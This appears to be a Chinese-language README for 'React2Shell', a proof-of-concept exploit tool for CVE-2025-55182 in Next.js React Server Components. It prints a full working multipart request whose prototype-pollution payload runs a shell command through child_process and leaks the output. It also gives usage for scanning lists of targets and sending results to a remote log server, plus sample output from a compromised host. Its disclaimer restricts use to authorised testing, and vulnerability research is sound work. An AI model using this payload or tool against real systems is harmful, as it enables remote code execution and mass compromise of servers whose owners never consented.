██████╗ ███████╗ █████╗ ██████╗████████╗██████╗ ███████╗██╗ ██╗███████╗██╗ ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║ ██║██╔════╝██║ ██║
██████╔╝█████╗ ███████║██║ ██║ █████╔╝███████╗███████║█████╗ ██║ ██║
██╔══██╗██╔══╝ ██╔══██║██║ ██║ ██╔═══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██║ ██║███████╗██║ ██║╚██████╗ ██║ ███████╗███████║██║ ██║███████╗███████╗███████╗
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝
作者:INDRA
本项目仅供教育目的、安全研究和授权渗透测试使用。
作者对本软件造成的任何滥用或损害不承担任何责任。
请仅对您拥有或已获得明确测试许可的系统使用此漏洞利用工具。
React2Shell 是一个针对 CVE-2025-55182 的概念验证(PoC)漏洞利用工具,影响 Next.js 中易受攻击的 React Server Components(RSC) 实现。
该工具发送精心构造的 multipart 请求,滥用存在漏洞的反序列化流程,并通过应用程序的重定向摘要(digest)响应提取命令输出。
利用成功后,该工具会直接在终端中显示所执行命令的输出。
Python 3.8+
安装依赖:
pip install requests urllib3
.
├── exploit.py
└── README.md
| 版本 | 状态 |
|---|---|
| 19.0 | ⚠ 存在漏洞 |
| 19.1.0 | ⚠ 存在漏洞 |
| 19.1.1 | ⚠ 存在漏洞 |
| 19.2.0 | ⚠ 存在漏洞 |
| 19.0.1 | ✅ 已修复 |
| 19.1.2 | ✅ 已修复 |
| 19.2.1 | ✅ 已修复 |
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
python exploit.py -h
python exploit.py -u https://target.com
targets.txt
target1.com
target2.com
target3.com
运行
python exploit.py -f targets.txt
python exploit.py -u https://target.com -o results.txt
python exploit.py -u https://target.com -l https://your-log-server.com
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com
| 选项 | 描述 |
|---|---|
-u | 目标 URL |
-f | 包含目标域名的文件 |
-o | 在本地保存存在漏洞的目标 |
-l | 将结果发送到远程日志服务器 |
-h | 显示帮助 |
🚀 Loaded 42 targets (HTTP + HTTPS)
🔥 [VULNERABLE] https://target.com/
💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)
──────────────────────────────────────────────
未经许可针对他人系统使用本软件可能违反当地、国家或国际法律。
作者对任何滥用行为概不负责。
狩猎愉快 🕷️